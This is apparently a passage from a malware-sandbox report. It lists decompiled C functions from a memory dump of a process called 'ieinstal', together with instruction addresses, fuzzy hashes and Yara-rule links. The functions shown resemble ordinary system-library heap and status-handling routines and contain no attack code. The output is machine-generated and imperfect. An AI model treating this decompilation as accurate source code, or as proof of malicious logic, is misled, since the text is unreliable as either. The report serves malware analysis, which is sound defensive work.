									_t28 = E1EFC7AF0(_t43, _a12, _a8,  &_v24, 0);
								}
								if(_t47 != 0) {
									return E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t47);
								}
								goto L9;
							}
							_t13 =  &(_t47[2]); // 0x8
							_t42 = _t13;
							_v16 =  *_t47;
							_v12 = _t47[1];
							_t30 = _t47[6];
							_v8 = _t30;
						} while (_t46 != 0xc000022d);
						E1F04C38B(_t43);
						_t30 = _v8;
						_t47 = 0;
					}
				}
				L9:
				return _t28;
			}

0x1efeea40
0x1efeea48
0x1efeea4c
0x1efeea4f
0x1efeea51
0x1efeea59
0x1efeea5b
0x1efeea5f
0x1efeea61
0x1efeea64
0x1efeea67
0x1efeea6d
0x1efeea77
0x1efeea7c
0x00000000
0x1efeea7e
0x1efeea7e
0x00000000
0x1efeea7e
0x1efeea80
0x1efeeaa3
0x1efeeaa3
0x1efeeaa8
0x1efeeaa9
0x1efeeaaa
0x1efeeaae
0x1efeeaaf
0x1efeeab7
0x1efeeae2
0x1efeeae9
0x1efeeaf1
0x1f02fb52
0x1f02fb54
0x1f02fb56
0x1f02fb59
0x1f02fb5b
0x1f02fb5e
0x1f02fb60
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x1efeeaf1
0x1efeea82
0x1efeea96
0x1efeea9a
0x1f02fb77
0x1efeeaa0
0x1efeeaa0
0x00000000
0x1efeeaa0
0x1efeea9a
0x1efeeabe
0x1f02fb8d
0x1f02fb8d
0x1efeeac6
0x00000000
0x1efeead4
0x00000000
0x1efeeac6
0x1efeeaf9
0x1efeeaf9
0x1efeeafc
0x1efeeb02
0x1efeeb05
0x1efeeb08
0x1efeeb0b
0x1f02fb68
0x1f02fb6d
0x1f02fb70
0x1f02fb70
0x1efeea7e
0x1efeeadd
0x1efeeadd

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7947dcc5fa93f7951906f64444a71fa96674b7eaf5384fdddf7509dd5d38e730
Instruction ID: 9cc16e46293d9bd00a01b45464b271167ef833f9e19414fc5dcbbb79d78dd9e1
Opcode Fuzzy Hash: 7947dcc5fa93f7951906f64444a71fa96674b7eaf5384fdddf7509dd5d38e730
Instruction Fuzzy Hash: 8631E176E01255EFC721DFA9C850A9EB7F8FF04750F12862AFC05E7650D270AA008BA0

Uniqueness

Uniqueness Score: -1.00%

Function 1F085C38 Relevance: .1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E1F085C38(signed int __ecx, intOrPtr* __edx) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				intOrPtr _t29;
				intOrPtr* _t30;
				intOrPtr _t40;
				void* _t44;
				signed int _t50;
				intOrPtr* _t51;
				intOrPtr _t52;

				_v20 = __edx;
				_t50 = __ecx;
				if(__edx != 0) {
					L1EFD2330(__edx, 0x1f0b433c);
					_t42 = _t50;
					_t40 = E1F085C15(_t50);
					if(_t40 != 0) {
						L15:
						E1EFD24D0(0x1f0b433c);
						 *_v20 = _t40;
						return 0;
					}
					_t44 = E1F085C15(_t42 ^ 0x00000100);
					if(_t44 != 0) {
						_v12 =  *((intOrPtr*)(_t44 + 4));
						_v8 =  *((intOrPtr*)(_t44 + 8));
						L7:
						_t51 = E1EFD5D90(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x50);
						if(_t51 != 0) {
							_t10 = _t51 + 0xc; // 0xc
							_t40 = _t10;
							_t29 = E1F077D67(_t50, _v12, _v8, _t40);
							_v16 = _t29;
							if(_t29 >= 0) {
								 *(_t51 + 8) = _t50;
								_t30 =  *0x1f0b341c; // 0x77253418
								if( *_t30 != 0x1f0b3418) {
									0x1f0b3418 = 3;
									asm("int 0x29");
								}
								 *_t51 = 0x1f0b3418;
								 *((intOrPtr*)(_t51 + 4)) = _t30;
								 *_t30 = _t51;
								 *0x1f0b341c = _t51;
								goto L15;
							}
							E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t51);
							_t52 = _v16;
							L11:
							E1EFD24D0(0x1f0b433c);
							return _t52;
						}
						_t52 = 0xc0000017;
						goto L11;
					}
					_push( &_v8);
					_push( &_v12);
					_push(_t44);
					_push(_t50 & 0xfffffeff);
					_push(0xc);
					_t52 = E1F003940();
					if(_t52 >= 0) {
						goto L7;
					}
					goto L11;
				}
				return 0xc00000f0;
			}

0x1f085c43
0x1f085c48
0x1f085c4c
0x1f085c5d
0x1f085c62
0x1f085c69
0x1f085c6d
0x1f085d2d
0x1f085d32
0x1f085d3a
0x00000000
0x1f085d3c
0x1f085c7e
0x1f085c82
0x1f085ca7
0x1f085cad
0x1f085cb0
0x1f085cc2
0x1f085cc6
0x1f085cd2
0x1f085cd2
0x1f085cdb
0x1f085ce0
0x1f085ce5
0x1f085d0a
0x1f085d12
0x1f085d19
0x1f085d1d
0x1f085d1e
0x1f085d1e
0x1f085d20
0x1f085d22
0x1f085d25
0x1f085d27
0x00000000
0x1f085d27
0x1f085cf4
0x1f085cf9
0x1f085cfc
0x1f085d01
0x00000000
0x1f085d06
0x1f085cc8
0x00000000
0x1f085cc8
0x1f085c87
0x1f085c8b
0x1f085c8c
0x1f085c94
0x1f085c95
0x1f085c9c
0x1f085ca0
0x00000000
0x00000000
0x00000000
0x1f085ca2
0x00000000

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0130ad5036f48178bbf5e883ee4c0d3e7ddd7ec83bab9e45e02aad890b48ac98
Instruction ID: 260261a1443dc2d6c46d6a9350c41ee870ef645100f33b809f2306415b11c418
Opcode Fuzzy Hash: 0130ad5036f48178bbf5e883ee4c0d3e7ddd7ec83bab9e45e02aad890b48ac98
Instruction Fuzzy Hash: 7431057AA00745EFD722CFA8C850BAE7BE4EF84724F14416AE905EB340DB71ED018B90

Uniqueness

Uniqueness Score: -1.00%

Function 1EFEAE89 Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E1EFEAE89(intOrPtr __ecx, signed int* __edx) {
				signed int _v8;
				char _v716;
				intOrPtr* _v720;
				short _v722;
				char _v724;
				intOrPtr _v728;
				signed int* _v732;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t27;
				intOrPtr _t32;
				void* _t35;
				intOrPtr _t39;
				void* _t42;
				void* _t46;
				intOrPtr* _t48;
				signed int* _t49;
				intOrPtr* _t50;
				signed int _t52;
				signed int _t53;

				_t47 = __edx;
				_t43 = __ecx;
				_v8 =  *0x1f0bb370 ^ _t53;
				_v728 = __ecx;
				_v732 = __edx;
				_t49 = 0;
				_t48 = 0x1ef91200;
				 *__edx = 0;
				_v720 =  &_v716;
				_v722 = 0x2be;
				_t27 = E1EFEB130(__ecx, 0, 0x1ef91200,  &_v724);
				if(_t27 == 0xc0000023) {
					_v722 = _v724 + 2;
					_t32 = E1EFD5D90(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v724 + 0x00000002 & 0x0000ffff);
					_v720 = _t32;
					goto L3;
				} else {
					if(_t27 >= 0) {
						_t32 = _v720;
						L3:
						if(_t32 == 0) {
							_t27 = 0xc00000bb;
						} else {
							_t35 = E1EFEB130(_t43, _t49, _t48,  &_v724);
							_t48 = _v720;
							_t42 = _t35;
							if(_t42 >= 0) {
								_t50 = _t48;
								_t47 = 0;
								_t46 = _t50 + 2;
								do {
									_t39 =  *_t50;
									_t50 = _t50 + 2;
								} while (_t39 != 0);
								_t52 = _t50 - _t46 >> 1;
								if(E1F007AD0(_v728, _t48, _t52) != 0) {
									_t42 = 0xc00000bb;
								} else {
									 *_v732 = _t52;
								}
								_t49 = 0;
							}
							if(_t48 !=  &_v716) {
								E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t49, _t48);
							}
							_t27 = _t42;
						}
					}
				}
				return E1F004B50(_t27, _t42, _v8 ^ _t53, _t47, _t48, _t49);
			}

0x1efeae89
0x1efeae89
0x1efeae9b
0x1efeaea2
0x1efeaea8
0x1efeaeae
0x1efeaeb1
0x1efeaeb6
0x1efeaebe
0x1efeaec9
0x1efeaed9
0x1efeaee3
0x1f02e224
0x1f02e23a
0x1f02e23f
0x00000000
0x1efeaee9
0x1efeaeeb
0x1efeaeed
0x1efeaef3
0x1efeaef5
0x1efeaf6b
0x1efeaef7
0x1efeaf00
0x1efeaf05
0x1efeaf0b
0x1efeaf0f
0x1efeaf11
0x1efeaf13
0x1efeaf15
0x1efeaf18
0x1efeaf18
0x1efeaf1b
0x1efeaf1e
0x1efeaf25
0x1efeaf39
0x1efeaf64
0x1efeaf3b
0x1efeaf41
0x1efeaf41
0x1efeaf43
0x1efeaf43
0x1efeaf4d
0x1f02e255
0x1f02e255
0x1efeaf53
0x1efeaf53
0x1efeaef5
0x1efeaeeb
0x1efeaf63

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c02f08609039f0ced828c42fca2eaa5eed55fffccc2edb6d0bda6e8e0c09f6c
Instruction ID: f4a678747143e8132ecb6a3f52b2b6092ed524c13c59e2c5ab019676982c69df
Opcode Fuzzy Hash: 1c02f08609039f0ced828c42fca2eaa5eed55fffccc2edb6d0bda6e8e0c09f6c
Instruction Fuzzy Hash: 5A3195759016699BD724DF258C58F9EB7B8FF44600F0602AAEC09E7650D734AE44CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 1EFFBC6E Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E1EFFBC6E(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				intOrPtr _v28;
				char _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x1f0bb370 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x1f0b5d78; // 0x0
					_t53 = E1EFD5D90(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E1F004B50(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E1F0088C0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(E1EFE1C7D(_t53, _t51, _t58) != 0) {
							_t28 = E1EFBE0E0(0x1efa1298, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E1EFF1280(_t42, _v32, _v28, 0x1efa1238, 1,  &_v24);
								_t28 = E1EFE99E0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}

0x1effbc7d
0x1effbc81
0x1effbc85
0x1effbc88
0x1effbc8f
0x1effbc94
0x1f03786f
0x1f03786f
0x1f037889
0x1f03788b
0x1f03788d
0x1effbcbc
0x1effbcca
0x1f037893
0x1f03789a
0x1f0378a9
0x1effbcaa
0x1effbcac
0x1effbcb6
0x1f0378bf
0x1f0378c4
0x1f0378c6
0x1f0378cd
0x1f0378cd
0x1f0378d0
0x1f0378d3
0x1f0378e4
0x1f0378ea
0x1f0378ed
0x1f0378f8
0x1f0378f8
0x1f0378fd
0x1f0378ff
0x1f037912
0x1f037912
0x1f0378ff
0x00000000
0x1effbcb6
0x1f03788d
0x1effbc9a
0x1effbc9e
0x1effbca0
0x1effbca4
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cde8327e3da55316dece24acc4e8ab489b25674ee970ca76526614b91ee525f1
Instruction ID: 34819fcc75586cb0eda39681a9b0f5c7cc80c1332dfa7e17e07f3ff1e6139b52
Opcode Fuzzy Hash: cde8327e3da55316dece24acc4e8ab489b25674ee970ca76526614b91ee525f1
Instruction Fuzzy Hash: 3B31D176A00229EADB00DF65CCA1ABFB7F9EF44700B01456AF901EB250E731ED11C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 1EFBDDB0 Relevance: .1, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E1EFBDDB0(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x1f0bb370 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E1EFC0FB0(__ecx, __edx, 0x1f0b666c, 0x1efbdd30, 0, 0);
					if( *0x1f0b32f0 > 5 && E1EFBDE1A(0x1f0b32f0, 0, 0x2000) != 0) {
						_v104 = 0;
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(__ecx + 0x28));
						_v84 =  *(__ecx + 0x24) & 0x0000ffff;
						_v156 =  *((intOrPtr*)(__ecx + 0x44));
						_v76 =  &_v156;
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v60 =  &_v144;
						_t70 = 8;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v44 =  &_v148;
						_t67 = 4;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v28 =  &_v164;
						_v68 = _t70;
						_v52 = 0x1f0b32f0;
						_v36 = 0x1f0b32f0;
						_v20 = _t70;
						_t69 = 0x1efa0d5a;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v152 = 0;
						_v72 = 0;
						_v64 = 0;
						_v56 = 0;
						_v48 = 0;
						_v40 = 0;
						_v32 = 0;
						_v160 = 0;
						_v24 = 0;
						_v16 = 0;
						_t48 = E1F04105C(0x1f0b32f0, 0x1efa0d5a, _t67, 0x1f0b32f0, _t70,  &_v140);
					}
				}
				return E1F004B50(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}

0x1efbddb0
0x1efbddc2
0x1efbddc5
0x1efbddcf
0x1efbddd2
0x1efbddd7
0x1efbdde5
0x1efbddf1
0x1f01d5b7
0x1f01d5ba
0x1f01d5c0
0x1f01d5c7
0x1f01d5cd
0x1f01d5d9
0x1f01d5e0
0x1f01d5ec
0x1f01d5f5
0x1f01d5f6
0x1f01d602
0x1f01d60a
0x1f01d60b
0x1f01d617
0x1f01d623
0x1f01d626
0x1f01d629
0x1f01d62c
0x1f01d62f
0x1f01d63a
0x1f01d641
0x1f01d644
0x1f01d647
0x1f01d64a
0x1f01d650
0x1f01d653
0x1f01d656
0x1f01d659
0x1f01d65c
0x1f01d65f
0x1f01d662
0x1f01d668
0x1f01d66b
0x1f01d66e
0x1f01d66e
0x1efbddf1
0x1efbde19

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dcc8fa51959583e6b1e1f776f3fc1a58b17420acdbed80f9235cd1eca889c39
Instruction ID: 7c1c0ebf8cf816ac15ba207f3c6b1c7eb8f4194c5f2377ce002d0960dcbf944f
Opcode Fuzzy Hash: 7dcc8fa51959583e6b1e1f776f3fc1a58b17420acdbed80f9235cd1eca889c39
Instruction Fuzzy Hash: 5641A4B5D002589EDB24CF9AD981ADDFBF4BB48310F5041AEE909E7240D7319A44CF51

Uniqueness

Uniqueness Score: -1.00%

Function 1EFB9D46 Relevance: .1, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E1EFB9D46(intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
				void* _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t29;
				void* _t56;
				intOrPtr _t58;
				signed int _t65;
				void* _t67;
				intOrPtr* _t69;
				void* _t71;

				_t57 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t69 = __ecx;
				_push(__edx);
				_v8 = __edx;
				_v12 = __ecx;
				if(E1EFE3D20(__edx, __edi, __ecx, __eflags) == 0) {
					_t29 = 0xc000000d;
				} else {
					_t56 =  *_t69;
					_push(__edi);
					_t65 = 0x00000017 + ( *(__edx + 1) & 0x000000ff) * 0x00000004 & 0xfffffff8;
					_t32 =  *((intOrPtr*)(_t56 + 8)) + _t65;
					if( *((intOrPtr*)(_t56 + 8)) + _t65 < _t65) {
						_t29 = 0xc0000173;
					} else {
						_t71 = E1EFD5D90(_t57,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t32);
						if(_t71 == 0) {
							_t29 = 0xc000009a;
						} else {
							E1F0088C0(_t71, _t56,  *((intOrPtr*)(_t56 + 8)));
							 *((intOrPtr*)(_t71 + 8)) =  *((intOrPtr*)(_t56 + 8)) + _t65;
							 *((intOrPtr*)(_t71 + 4)) =  *((intOrPtr*)(_t56 + 4)) + 1;
							_t58 =  *((intOrPtr*)(_t56 + 8));
							 *((intOrPtr*)(_t58 + _t71)) = (0 | _a4 != 0x00000000) + 2;
							 *(_t58 + _t71 + 4) = _t65;
							E1F0088C0(_t58 + 8 + _t71, _v8, 8 + ( *(_v8 + 1) & 0x000000ff) * 4);
							_t67 = E1EFB94C8(_t71);
							if(_t67 < 0) {
								E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t71);
								_t29 = _t67;
							} else {
								E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
								 *_v12 = _t71;
								_t29 = 0;
							}
						}
					}
				}
				return _t29;
			}

0x1efb9d46
0x1efb9d4b
0x1efb9d4c
0x1efb9d51
0x1efb9d53
0x1efb9d54
0x1efb9d57
0x1efb9d61
0x1f01bb94
0x1efb9d67
0x1efb9d6b
0x1efb9d6d
0x1efb9d78
0x1efb9d7b
0x1efb9d7f
0x1f01bb9e
0x1efb9d85
0x1efb9d96
0x1efb9d9a
0x1f01bba8
0x1efb9da0
0x1efb9da5
0x1efb9db2
0x1efb9db9
0x1efb9dc1
0x1efb9dca
0x1efb9dcd
0x1efb9de4
0x1efb9df3
0x1efb9df7
0x1f01bbbf
0x1f01bbc4
0x1efb9dfd
0x1efb9e09
0x1efb9e11
0x1efb9e13
0x1efb9e13
0x1efb9df7
0x1efb9d9a
0x1efb9e15
0x1efb9e19

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c1bd2c5909469b086105e0157cf97be3f28b4ffec6a9e1badc9caecc0ed897d
Instruction ID: 5aae78365c0eadcc63ad196f18047c447345e89c261ab66b00fd7f90b637af39
Opcode Fuzzy Hash: 8c1bd2c5909469b086105e0157cf97be3f28b4ffec6a9e1badc9caecc0ed897d
Instruction Fuzzy Hash: 3531E1B6600A54EFC721CF19CC90B4ABBB9FB44654F1C859AA848CF641D675ED41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1F016F70 Relevance: .1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E1F016F70(intOrPtr* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				signed char _v8;
				intOrPtr* _v12;
				signed char* _v16;
				intOrPtr* _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed char _t34;
				intOrPtr _t51;
				intOrPtr* _t53;
				intOrPtr* _t56;
				intOrPtr _t58;
				intOrPtr* _t59;
				intOrPtr* _t60;
				signed char* _t64;
				intOrPtr* _t68;
				intOrPtr* _t69;
				intOrPtr* _t70;
				intOrPtr _t71;

				if(E1EFD3C40() == 0) {
					_t53 = 0x7ffe03c8;
					_t64 = 0x7ffe025c;
					_t56 = 0x7ffe0020;
					_t6 = _t53 + 8; // 0x7ffe03d0
					_t68 = _t6;
				} else {
					_t51 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
					_t64 = _t51 + 0x24c;
					_t56 = _t51 + 0x250;
					_t53 = _t51 + 0x260;
					_t68 = _t51 + 0x268;
				}
				_v28 = _t68;
				_v12 = _t53;
				_v20 = _t56;
				_v16 = _t64;
				while(1) {
					_t34 =  *_t64;
					_v8 = _t34;
					if((_t34 & 0x00000001) == 0) {
						goto L7;
					}
					L5:
					asm("pause");
					continue;
					while(1) {
						L7:
						_t58 =  *((intOrPtr*)(_t56 + 4));
						_v24 =  *_t56;
						if(_t58 ==  *((intOrPtr*)(_t56 + 8))) {
							break;
						}
						asm("pause");
					}
					_t69 = _a4;
					 *_t69 = _v24;
					_t70 = _v28;
					 *((intOrPtr*)(_t69 + 4)) = _t58;
					_t59 = _a8;
					if(_t59 != 0) {
						 *_t59 =  *_t53;
						 *((intOrPtr*)(_t59 + 4)) =  *((intOrPtr*)(_t53 + 4));
					}
					_t60 = _a12;
					if(_t60 != 0) {
						 *_t60 =  *_t70;
						 *((intOrPtr*)(_t60 + 4)) =  *((intOrPtr*)(_t70 + 4));
					}
					_t71 =  *0x7FFE0014;
					if( *0x7ffe0018 !=  *0x7ffe001c) {
						do {
							asm("pause");
							_t71 =  *0x7ffe0014;
						} while ( *0x7FFE0018 !=  *0x7FFE001C);
						_t56 = _v20;
						_t64 = _v16;
						_t53 = _v12;
					}
					if(_v8 !=  *_t64) {
						goto L5;
					}
					return _t71;
				}
			}

0x1f016f85
0x1f016faa
0x1f016faf
0x1f016fb4
0x1f016fb9
0x1f016fb9
0x1f016f87
0x1f016f8d
0x1f016f90
0x1f016f96
0x1f016f9c
0x1f016fa2
0x1f016fa2
0x1f016fbc
0x1f016fc0
0x1f016fc4
0x1f016fc8
0x1f016fcc
0x1f016fcc
0x1f016fce
0x1f016fd4
0x00000000
0x00000000
0x1f016fd6
0x1f016fd6
0x00000000
0x1f016fdc
0x1f016fdc
0x1f016fdc
0x1f016fe1
0x1f016fea
0x00000000
0x00000000
0x1f016fda
0x1f016fda
0x1f016fec
0x1f016ff3
0x1f016ff7
0x1f016ffb
0x1f016ffe
0x1f017003
0x1f017007
0x1f01700c
0x1f01700c
0x1f01700f
0x1f017014
0x1f017018
0x1f01701d
0x1f01701d
0x1f01702a
0x1f017035
0x1f017042
0x1f017042
0x1f017046
0x1f01704a
0x1f01704e
0x1f017052
0x1f017056
0x1f017056
0x1f017060
0x00000000
0x00000000
0x1f01706e
0x1f01706e

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
Instruction ID: 883975bfde8912bd77d523e15c7ab157fba17c273451b8624205cbc0cb991556
Opcode Fuzzy Hash: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
Instruction Fuzzy Hash: E6311675608316CFC700CF29C880A4ABBE5FF88354B2586A9E958DB315E731FD46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1EFBCB1E Relevance: .1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1EFBCB1E(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				void* _v9;
				short _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _t25;
				short _t27;
				intOrPtr _t33;
				signed char _t40;
				intOrPtr _t41;
				signed char _t49;
				void* _t51;
				void* _t52;

				_t41 = __ecx;
				_t51 = __edx;
				_v24 = __ecx;
				_t40 = 0;
				_t25 = 0;
				_v16 = 0;
				_v9 = 0;
				if(__ecx == 0 || __edx == 0) {
					_t52 = 0xc000000d;
					goto L7;
				} else {
					_t49 = 0x55;
					_t33 = E1EFBD818(__ecx, _t49);
					_v20 = _t33;
					if(_t33 == 0) {
						_t52 = 0xc0000017;
						L17:
						 *(_t51 + 8) =  *(_t51 + 8) & 0x00003fff;
						_t27 = 0;
						L12:
						 *((short*)(_t51 + 0xa)) = _t27;
						return _t52;
					}
					_v28 = _t33;
					_v32 = 0xaa0000;
					_t52 = E1EFE41D0(_t49, _a4,  &_v32, 6, 0);
					_t56 = _t52;
					if(_t52 >= 0) {
						_t52 = E1EFBCBF5(_v24, _v28, _t56,  &_v9, _t41,  &_v16);
						if(_t52 < 0) {
							_t40 = 0;
							_v9 = 0;
							_v16 = 0;
						} else {
							_t40 = _v9;
						}
					}
					_t25 = _v20;
					L7:
					if(_t25 != 0) {
						E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t25);
						_t40 = _v9;
					}
					if(_t52 < 0) {
						goto L17;
					} else {
						if(_t40 == 0) {
							_t52 = 0xc0000001;
							goto L17;
						}
						_t27 = _v16;
						 *(_t51 + 8) = (_t40 & 0x000000ff) << 0x0000000e |  *(_t51 + 8) & 0x00003fff;
						goto L12;
					}
				}
			}

0x1efbcb1e
0x1efbcb29
0x1efbcb2b
0x1efbcb30
0x1efbcb32
0x1efbcb34
0x1efbcb38
0x1efbcb3d
0x1f01a14d
0x00000000
0x1efbcb4b
0x1efbcb4d
0x1efbcb4e
0x1efbcb53
0x1efbcb58
0x1f01a136
0x1f01a15c
0x1f01a161
0x1f01a165
0x1efbcbe8
0x1efbcbe8
0x1efbcbf2
0x1efbcbf2
0x1efbcb60
0x1efbcb6c
0x1efbcb78
0x1efbcb7a
0x1efbcb7c
0x1efbcb92
0x1efbcb96
0x1f01a13d
0x1f01a141
0x1f01a144
0x1efbcb9c
0x1efbcb9c
0x1efbcb9c
